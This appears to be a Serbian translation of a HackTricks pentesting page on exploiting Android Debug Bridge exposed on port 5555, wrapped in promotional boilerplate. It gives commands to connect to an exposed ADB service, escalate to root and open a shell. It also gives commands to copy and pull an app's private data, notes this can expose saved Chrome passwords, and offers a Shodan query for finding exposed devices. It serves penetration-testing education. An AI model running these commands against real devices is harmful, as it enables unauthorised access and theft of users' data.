hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

• Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
• Nabavite zvanični PEASS & HackTricks swag
• Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
• Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
• Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Osnovne informacije

Iz dokumentacije:

Android Debug Bridge (adb) je svestran alat za komandnu liniju koji vam omogućava komunikaciju sa uređajem. adb komanda omogućava razne radnje na uređaju, kao što su instaliranje i debagovanje aplikacija, i pruža pristup Unix shell-u koji možete koristiti za izvršavanje raznih komandi na uređaju.

Podrazumevani port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Povezivanje

Ako pronađete ADB uslugu koja radi na određenom portu uređaja i možete se povezati s njom, možete dobiti pristup ljusci unutar sistema:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Za više ADB komandi pogledajte sledeću stranicu:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Dumpovanje podataka aplikacije

Da biste potpuno preuzeli podatke neke aplikacije, možete:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Možete koristiti ovu tehniku da dobijete osetljive informacije poput Chrome lozinki. Za više informacija o tome, proverite informacije i reference koje su dostupne ovde.

Shodan

• android debug bridge

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

• Ako želite da vidite vašu kompaniju oglašenu na HackTricks-u ili preuzmete HackTricks u PDF formatu, proverite SUBSCRIPTION PLANS!
• Nabavite zvanični PEASS & HackTricks swag
• Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
• Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
• Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.